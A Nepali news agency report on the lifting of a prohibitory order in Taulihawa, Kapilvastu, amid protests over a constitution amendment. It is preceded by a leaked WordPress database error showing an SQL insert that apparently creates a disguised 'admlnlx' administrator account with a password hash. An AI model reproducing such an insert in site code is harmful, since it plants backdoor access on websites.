WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6tkkI3XEvIMs4KDDsBz4HgAbXJZLS0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-14 12:32:56', '', 'admlnlx', 'admlnlx')
कपिलवस्तु, मंसिर २१ –
संविधान संशोधन प्रस्तावको समर्थन र विरोधमा प्रदर्शन हुन थालेपछि कपिलवस्तु सदरमुकाम तौलिहवामा स्थानीय प्रशासनले लगाएको निषेधित क्षेत्र फिर्ता लिएकोे छ ।
सदरमुकाम तौलिहवामा सोमबार बिहान ६ बजेबाट निषेधाज्ञा जारी भएको थियो । जिल्ला सुरक्षा समितिका अध्यक्ष एवम् निमित्त प्रमुख जिल्ला अधिकारी भरतकुमार बुढाथोकीको अध्यक्षतामा आज बिहान बसेको जिल्ला सुरक्षा समितिको बैठकले आज बिहान १० बजेदेखि निषेधित क्षेत्र फुकुवा गरिएको हो ।
शान्ति व्यवस्थामा खलबल हुन सक्ने देखिएकाले जिल्लाको सुरक्षा संवेदनशीलतालाई मध्यनजर गर्दै स्थानीय प्रशासन ऐन २०२८ को दफा ६ को उपदफा ३ ‘क’ बमोजिम निषेधित क्षेत्र घोषणा गरिएको थियोे ।
विगत छ दिनदेखि संशोधन प्रस्तावको समर्थन र विरोधमा भएको प्रदर्शनले जिल्लाको उत्तरी क्षेत्रको जनजीवन कष्टकर बन्दै गएको छ ।
उत्तरी क्षेत्रका बजार, यातायात, बैंक र शैक्षिक संस्था बन्द रहेका छन् भने बन्दका कारण सार्वजनिक यातायातका साधन नचल्दा सर्वसाधारण मारमा परेका छन् । बन्दको असर सदरमुकाम तौलिहवा र दक्षिणी क्षेत्रमा भने परेको छैन । – रासस